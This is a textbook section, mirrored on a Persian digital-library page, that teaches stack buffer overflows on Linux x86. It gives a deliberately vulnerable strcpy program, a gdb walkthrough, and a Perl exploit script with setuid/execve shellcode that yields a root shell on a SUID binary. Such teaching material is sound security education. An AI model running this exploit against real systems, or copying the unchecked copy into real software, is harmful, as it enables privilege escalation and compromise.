Network.Security.Tools [Electronic resources] نسخه متنی

5.2. Overview of Stack Buffer Overflows

Security problems
have always been an issue in software. From users abusing
time-sharing operating systems in the '70s to the
remote network compromises of the current day, software always
hasand always will havesecurity bugs. Starting in the
late 1980s a new type of software vulnerability known as
overflows
began to be exploited. Since then overflows have become the
undisputed king of vulnerabilities, accounting for the majority of
security advisories in the last 10 years.

What follows is a brief refresher on
stack-based
buffer overflows and how you
can exploit them. This section is intended as an overview only, so
feel free to skip ahead if you already have a firm grasp on the
subject.

5.2.1. Memory Segments and Layout

In general,
today's operating systems
(OSes) support two levels of protected memory areas in which
processes can run: user
space and kernel
space. The kernel space is where the core processes of the
OS execute. The user space is where user-level processessuch
as daemonsexecute. A discussion of memory corruption
attacks should focus on two areas:
kernel space attacks and user-level processes. Kernel space attacks
are beyond the scope of this chapter and really
aren't what MSF was designed for, so
we'll focus on user-space processes. Attacks against
these processes can be generalized in local and remote attacks. MSF
in general is used to exploit programs that listen for remote network
connections, and in the example module later in this chapter,
we'll focus on this kind of attack.

Before discussing how to exploit process memory, it is necessary to
understand how the virtual memory for user-level processes is
organized. The following paragraphs discuss the Linux operating
system on the x86 architecture. Many of the general concepts will
apply to other operating systems and architectures.

When the OS initializes a process, it maps five main virtual memory
segments. Each segment has a specific purpose and can either have a
fixed size or grow as needed. Table 5-2 describes
each standard" mmory segment in
Linux. The code, data, and BSS segments are
populated with information from the executable during process
initialization. The heap and stack typically have fixed
starting positions but then grow according to a
program's instructions. It should be noted that
wherever a static buffer exists in memory, it can overflow. However,
our discussion will focus on stack segment buffer overflows, as they
account for the majority of exploited overflows.

Table 5-2. Relevant user-space virtual memory segments
Segment name	Description
Code	This segment contains the actual instructions the program will execute.
Data	This segment contains global and static variables with initialized values.
BSS	This segment contains global and static variables that are uninitialized.
Heap	This segment is for dynamic memory allocations.
Stack	This segment is a memory range for allocation of variables local to a function and is thus dynamic, depending on the function call tree.

When the process has finished initialization, the segments will be
ordered, as shown in Figure 5-1.

Figure 5-1. Virtual memory layout of a process

Now that we've looked at and described the memory
segments, let's see in exactly which segments the
variables in our code will be located. Here is a C code snippet that
illustrates the memory regions where the variables will be allocated
when the program is run:

int global_initialized = 311;      //located in the data segment
char global_uninitialized;         //located in the bss segment
int main( ){
int local_int;                         //located on the stack
static char local_char;        //located in the bss segment
char *local_ptr;               //located on the stack
local_ptr =(char *)malloc(12); //local_ptr points to 
//a buffer located on the heap
char buffer[12];               //entire buffer located on the stack
return 0;
}

5.2.2. How a Buffer Overflows and Why It Matters

A process can allocate memory
using stack or heap
segments. Heaps allow the allocation of memory dynamically using C
functions such as malloc( ), but with this comes
the overhead of the OS's internal dynamic memory
allocation routines. Stacks are more convenient for developers
because the declaration syntax is simpler, and there is no overhead
from dynamic memory allocation routines of the OS.

A stack is a last-in-first-out (LIFO) queue. The common stack
operators are push (to add to the end of the stack) and
pop (to remove the last item placed on the stack).
These operators are used on the Assembly level by instructions with
the same name. The stack is 32 bits wide and usually has a static
starting position. Its size is governed by the

extended base pointer (EBP) and
extended stack pointer (ESP) CPU registers, but it typically grows
"down." As it grows, the top of the
stack (ESP) gets closer to the lowest virtual memory address, as in
Figure 5-2. Also shown in Figure 5-2 is the ESP register, which points to the top
of the stack. The EBP register serves a special purpose, as it
identifies the start of a stack frame by pointing to the bottom of
the current stack frame. A stack
frame is an area of memory that holds the
local function variables as well as the arguments that were passed to
the function that is executing. Stack frames are allocated by
subtracting from the value of EBP and moving the bottom of the stack
frame up the stack. The program performs these actions using a small
series of Assembly instructions known as
prolog and
epilog.

Figure 5-2. Key elements of the stack segment

When a new function is called, the address of the
callee's next instruction is pushed onto the stack.
This address is where the extended
instruction pointer (EIP) should point when the called function
returns control to the callee. Then the prolog pushes the callee
function's EBP onto the stack and moves the EBP to
point to the ESP. As seen in the code snippets in Table 5-3, this creates a new stack frame where space
for new local variables can be allocated by simply subtracting from
ESP to grow the stack.

Table 5-3. An example C program and its x86 disassembly
Example C program	x86 disassembly
1\| void example( ){	1\| example:
2\| int i;	2\| push %ebp
3\| }	3\| mov %esp,%ebp
4\| int main( ){	4\| sub $0x4,%esp
5\| example( );	5\| leave
6\| }	6\| ret

	7\| main:
	8\| push %ebp
	9\| mov %esp,%ebp
	10\| sub $0x8,%esp
	11\| call 0x8048310 <example>
	12\| leave
	13\| ret

In Table 5-3 a new stack frame is created when a new function
gets called. Because there are two functions, we'll
have two stack frames. In the disassembly, it's
possible to identify where new stack frames are created by looking
for three things: the prolog, the epilog, and use of the
call instruction. Lines 8 and 9 of the disassembly
show the prolog for the main function. Lines 2 and 3 show the prolog
for the example function.

As the main function starts, the prolog sets up the new stack frame.
Then a new frame for the example function begins
on line 11. The call instruction pushes a
pointer to the next instruction onto the top of the stack. Once in
the example function, the
function's prolog generates the next stack frame. On
line 4, the stack size is adjusted by 4 bytes; this is the space
needed to store the integer variable i. Finally,
the example function's
epilog executes on lines 5 and 6.
It essentially reverses the actions of the prolog and erases the
stack frame.

The epilog is important because the
ret instruction returns control to the
calling function. It sets the new instruction
pointer based on the value stored on the stack during the call
instruction. This is the key to what makes stack overflows so
dangerous. Pointers that influence program flow are
located on the stack. If these pointers can be overwritten, we can
gain control of the program's execution.

Here is a sample C code
snippet that takes one user-controlled input and copies it to a
fixed-size stack buffer:

/* vuln.c */
int main(int argc, char **argv){
char fixed_buf[8];
if(argc<2){exit(-1);}
strcpy(fixed_buf,argv[1]);
return 0;
}

In the following section, the program will be compiled and traced
with a debugger to show the overflow process in action. By using a
program argument of AAAAAAAABBBBCCCC, we can see
how saved EIP (sEIP) is overwritten.
Figure 5-3 shows the stack frame before and after
strcpy( ) to illustrate the
stack's status after the overwrite. Note that the
ASCII codes for the characters A, B, and C are 0x41, 0x42, and 0x43,
respectively. Also notice that the sEIP is being overwritten with
values we control!

Figure 5-3. The stack frame and setup before and after strcpy

Some compilers align stack buffers
differently; depending on your compiler it might take more input to
fully overwrite the sEIP with the example value
0x43434343.

5.2.3. Shellcode

The

good
news is that now we have a way of controlling
program flow. At this point we need
what is commonly referred to as
shellcode.
Shellcode is a set of assembly instructions in which program flow can
be redirected and perform some functionality. The term
"shellcode" was coined to reflect
the fact that it contains Assembly instructions that execute a shell
(command interpreter), often at higher privilege levels. But where
should we place this shellcode? Because we already used our user
input buffer to take control of EIP, there is no reason we
can't use the same buffer to serve a dual purpose by
also including the shellcode directly in the buffer. Because this
overflow is occurs in a C-style string, we should write the shellcode
to avoid the NULL delimiting byte.

In an ideal world of exploitation, the top of the stack
wouldn't move and we could jump to this known
location every time. But in the real world of remote exploits many
factors affect where the top of the stack will be on program return,
so we need a solution for dealing with these variations in where our
shellcode will lie.

One way of dealing with this problem is to use what is commonly known
as a NOP sled. The NOP assembly instruction
performs "no operation." It
basically does nothing and has no effect on any CPU registers or
flags. What is good about this is that we can prepend our shellcode
with a buffer that consists solely of the bytes that represent the
NOP instruction; on x86 architecture this is 0x90. This technique
compensates for the stack's unpredictability by
changing program flow to anywhere within the NOP sled, and the
execution will continue up the buffer until it hits the shellcode.

Putting together the concepts we learned so far, we now can construct
user input to take control of program execution and run arbitrary
shellcode. Figure 5-4 shows what our final buffer
for the first program argument will look like.

Figure 5-4. Final construction of the input buffer

The known values in this buffer are the shellcode and the NOP sled.
For local exploits such as this one, you should use a shellcode that
does setuid( ) and exec( ) to spawn the
new root-level shell. The aforementioned \x90
character will be used to fill the NOP sled. In our example, the
values to be used for the "filler
space" buffer can be arbitrary printable ASCII, so
we'll use the character A. The final unknown is
the
new EIP
valuethat is, the memory location we hope will be
within our NOP sled. This new EIP value is commonly known as
the return. To find it, use a debugger to examine
the process memory after using a trace buffer to trigger the
vulnerability. We construct a trace buffer so that it is visually
easier to find key areas of buffer in memory.

First, compile the executable with debugging symbols:

$ gcc vuln.c -o vuln -g

Next, run the gdb
debugger. Once in the
gdb shell, run the program with a simple trace
buffer generated from the command line using Perl:

$ gdb -q vuln
(gdb) run `perl -e 'print "A"x28 . "1234" . "C"x1024'`
Starting program: /home/cabetas/research/book/vuln `perl -e 
'print "A"x28 . "1234" . "C"x1024'`
Program received signal SIGSEGV, Segmentation fault.
0x34333231 in ?? ( )
(gdb) x/x $esp
0xbfff8d60:     0x43434343
(gdb) x/x $esp+1020
0xbfff915c:     0x43434343
(gdb) print ($esp+512)
$1 = (void *) 0xbfff8f60

Note that the buffer's structure is modeled after
what our eventual exploit buffer will look like, with the bytes
1234 directly overwriting the sEIP and the
Cs representing where our NOP sled will be. Also
note that in this example the compiler aligned my buffer in such a
way that it took 28 bytes before overwriting sEIP.

The program generates a segmentation fault, which signifies that it
attempted to access an unmapped area of memory. This memory location
is 0x34333231, the ASCII code equivalent of 4321.

Little-Endian Memory Values

Why did our sEIP overwrite come out backward from our input? The
answer has to do with how memory values are stored on x86
architectures. The little-endian format stores values in
reverse byte order. For our example, the overwritten value of
1234 becomes 0x34333231 in
little-endian order and 0x31323334 in big-endian
order. The byte values remain the same, but they are switched so that
the most significant byte is written first.

After the program crashes, examine the memory located at the
stack pointer (ESP).
You'll notice it points to byte values that
represent the letter C. If you examine the memory before and after
ESP you'll see the buffer actually starts here and
the last four-byte block is located at $esp+1020.
Because this is where we will eventually place our NOP sled, we want
to find a value within this range. We will use the
$esp+512 value because it's the
midpoint of the buffer, and it has the highest chance of success. Now
we have the new EIP value that the exploited program will return to:
0xbfff8f60.

5.2.4. Putting It All Together: Exploiting a Program

All the elements of our exploit buffer are in
place: the filler, the new EIP the program will return to, the NOP
sled, and our shellcode. It's time to try it out
from the command line outside the debugger. Here is a Perl script
that generates an exploit buffer using the previously discussed
values. Note that the pack( ) function handles the
little-endian conversion:

#!/usr/bin/perl
# File: exploit_buffer.pl
my $shellcode = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80".
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b".
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd".
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
my $return = 0xbfff8f60;
print "A"x28 . pack('V',$return) . "\x90"x1024 . $shellcode;

The chown and chmod commands
are used to set up our example program as a set user
ID (SUID) application. These commands
cause the program to be executed at the root user's
privilege level. This is done to demonstrate the effect of an
exploited SUID root program in the wild.

$ su
Password:
# chown root:root ./vuln
# chmod +s ./vuln
# exit
$ ls -la vuln
-rwsrwsr-x    1 root     root         5817 Jan 24 05:50 vuln

Now, for the actual exploitation of the program; use the
` (backtick) character to execute the
Perl script that generates our exploit buffer. This buffer becomes
the first argument to our vulnerable program. As previously
mentioned, the overflowed program overwrites the sEIP address to our
new return value which should point into our NOP sled. Execution
continues up the NOP sled until our shellcode executes, giving us
root access.

$./vuln `perl exploit_buffer.pl`
# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

If you are using Perl version 5.8.0 or newer with UNICODE support,
you should unset the LANG environment variable to
ensure that functions such as pack( ) work as
expected. Various parts of MSF will fail otherwise. As a test, the
following shell command should print the number 4
when your locale settings are correct:

perl -e 'print pack("V",0xffffffff);' |wc -c

Network.Security.Tools [Electronic resources] نسخه متنی

فارسی

کردی

العربیه

اردو

Türkçe

Русский

English

Français

کانال فیلم من

تبیان من

فایلهای من

کتابخانه من

پنل پیامکی

وبلاگ من

اینجــــا یک کتابخانه دیجیتالی است

با بیش از 100000 منبع الکترونیکی رایگان به زبان فارسی ، عربی و انگلیسی